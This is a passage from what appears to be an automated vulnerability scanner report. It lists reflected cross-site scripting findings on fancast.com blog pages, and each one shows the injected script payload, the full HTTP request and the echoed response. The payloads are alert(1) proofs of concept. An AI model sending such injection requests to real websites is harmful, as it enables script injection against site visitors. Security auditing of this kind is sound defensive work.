<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Huge Ratings for Larry King's Fi
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news50d2b</script><script>alert(1)</script>a46c743dd20/huge-ratings-for-larry-kings-finale/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;
...[SNIP]...

2.464. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af5a3"><script>alert(1)</script>aa00e785c7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as af5a3\"><script>alert(1)</script>aa00e785c7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?af5a3"><script>alert(1)</script>aa00e785c7b=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:10 GMT
Content-Length: 34286

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Huge Ratings for Larry King's Fi
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?af5a3\"><script>alert(1)</script>aa00e785c7b=1"/>
...[SNIP]...

2.465. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eba9</script><script>alert(1)</script>c87a4b3b6aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?5eba9</script><script>alert(1)</script>c87a4b3b6aa=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:15 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:14 GMT
Content-Length: 34316

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Huge Ratings for Larry King's Fi
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?5eba9</script><script>alert(1)</script>c87a4b3b6aa=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.466. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3522"><script>alert(1)</script>dd80bc7577f was submitted in the REST URL parameter 3. This input was echoed as a3522\"><script>alert(1)</script>dd80bc7577f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-newsa3522"><script>alert(1)</script>dd80bc7577f/jersey-shores-ronnie-indicted-on-assault-charge/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:51 GMT
Content-Length: 34824

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Jersey Shore's Ronnie Indicted
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsa3522\"><script>alert(1)</script>dd80bc7577f/jersey-shores-ronnie-indicted-on-assault-charge/"/>
...[SNIP]...

2.467. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68246</script><script>alert(1)</script>65e10340d27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news68246</script><script>alert(1)</script>65e10340d27/jersey-shores-ronnie-indicted-on-assault-charge/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:54 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:54 GMT
Content-Length: 34854

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Jersey Shore's Ronnie Indicted
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news68246</script><script>alert(1)</script>65e10340d27/jersey-shores-ronnie-indicted-on-assault-charge/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="
...[SNIP]...

2.468. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb782</script><script>alert(1)</script>221644df2a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?eb782</script><script>alert(1)</script>221644df2a7=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 34869

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Jersey Shore's Ronnie Indicted
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?eb782</script><script>alert(1)</script>221644df2a7=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.469. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3feb7"><script>alert(1)</script>89ab2476a96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3feb7\"><script>alert(1)</script>89ab2476a96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?3feb7"><script>alert(1)</script>89ab2476a96=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:46 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:46 GMT
Content-Length: 34839

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Jersey Shore's Ronnie Indicted
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?3feb7\"><script>alert(1)</script>89ab2476a96=1"/>
...[SNIP]...

2.470. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0df6</script><script>alert(1)</script>b5f2cdde909 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-newsf0df6</script><script>alert(1)</script>b5f2cdde909/late-night-foes-ferguson-and-fallon-swap-gifts/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:00 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:00 GMT
Content-Length: 37432

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Late-Night Foes Ferguson and Fal
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-newsf0df6</script><script>alert(1)</script>b5f2cdde909/late-night-foes-ferguson-and-fallon-swap-gifts/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="b
...[SNIP]...

2.471. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdccd"><script>alert(1)</script>0bf982dc15 was submitted in the REST URL parameter 3. This input was echoed as fdccd\"><script>alert(1)</script>0bf982dc15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-newsfdccd"><script>alert(1)</script>0bf982dc15/late-night-foes-ferguson-and-fallon-swap-gifts/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:56 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:56 GMT
Content-Length: 37397

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Late-Night Foes Ferguson and Fal
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsfdccd\"><script>alert(1)</script>0bf982dc15/late-night-foes-ferguson-and-fallon-swap-gifts/"/>
...[SNIP]...

2.472. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5a79</script><script>alert(1)</script>5e476fe08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?a5a79</script><script>alert(1)</script>5e476fe08b=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:55 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:55 GMT
Content-Length: 37442

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Late-Night Foes Ferguson and Fal
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?a5a79</script><script>alert(1)</script>5e476fe08b=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.473. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fddae"><script>alert(1)</script>dc4db8d140b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fddae\"><script>alert(1)</script>dc4db8d140b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?fddae"><script>alert(1)</script>dc4db8d140b=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 37417

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Late-Night Foes Ferguson and Fal
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?fddae\"><script>alert(1)</script>dc4db8d140b=1"/>
...[SNIP]...

2.474. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>81a5cc71d84 was submitted in the REST URL parameter 3. This input was echoed as 12788\"><script>alert(1)</script>81a5cc71d84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news12788"><script>alert(1)</script>81a5cc71d84/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:55 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:55 GMT
Content-Length: 38324

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Letterman's Top Ten Things Overh
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news12788\"><script>alert(1)</script>81a5cc71d84/lettermans-top-ten-things-overheard-on-larry-kings-final-show/"/>
...[SNIP]...

2.475. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35f54</script><script>alert(1)</script>ac1546956da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news35f54</script><script>alert(1)</script>ac1546956da/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:58 GMT
Content-Length: 38354

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Letterman's Top Ten Things Overh
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news35f54</script><script>alert(1)</script>ac1546956da/lettermans-top-ten-things-overheard-on-larry-kings-final-show/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency=
...[SNIP]...

2.476. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba7d</script><script>alert(1)</script>bcd2e455558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?7ba7d</script><script>alert(1)</script>bcd2e455558=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:54 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:54 GMT
Content-Length: 38369

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Letterman's Top Ten Things Overh
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?7ba7d</script><script>alert(1)</script>bcd2e455558=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.477. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e4b"><script>alert(1)</script>9ea6fd3928a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4b\"><script>alert(1)</script>9ea6fd3928a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?b1e4b"><script>alert(1)</script>9ea6fd3928a=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 38339

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Letterman's Top Ten Things Overh
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?b1e4b\"><script>alert(1)</script>9ea6fd3928a=1"/>
...[SNIP]...

2.478. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1b1c</script><script>alert(1)</script>e02b396ef72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-newsb1b1c</script><script>alert(1)</script>e02b396ef72/neil-patrick-harris-slams-eric-braeden-for-bailing/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
